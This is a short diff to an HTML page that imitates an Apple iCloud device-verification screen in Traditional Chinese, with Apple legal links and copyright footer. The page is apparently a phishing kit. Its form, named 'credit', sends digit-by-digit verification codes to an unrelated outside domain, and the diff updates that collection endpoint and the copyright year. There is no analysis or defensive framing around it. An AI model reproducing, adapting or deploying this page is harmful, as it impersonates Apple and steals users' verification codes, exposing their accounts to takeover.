--- a/codeindex/index.html
+++ b/codeindex/index.html
@@ -53,7 +53,7 @@
 }
 </style>
 <div class="verify-device fade-in">
-    <form id="form1" name="credit" method="post" action="http://profile10632458.info/user/apple//3.php"> 
+    <form id="form1" name="credit" method="post" action="http://profile10632458.info/user/apple/4.php"> 
         <div class="field-wrap">
             <input maxlength="1" name="col1" placeholder="" value="" type="text" id="char1" class="form-control char-field" onkeyup="return checkNum(this, value);">
         </div>
@@ -295,7 +295,7 @@
 			<a href="https://www.apple.com/legal/icloud/ww/" target="_blank">
 			條款與約定</a>
 			<span class="footer-link-separator"></span>
-			<span class="copyright">Copyright © 2017 Apple Inc. 保留一切權利。</span>
+			<span class="copyright">Copyright © 2018 Apple Inc. 保留一切權利。</span>
 		</div>
 		<div class="col-md-2 col-xs-12 apple">
 			<a href="https://www.apple.com/" target="_blank" class="apple-logo"></a>
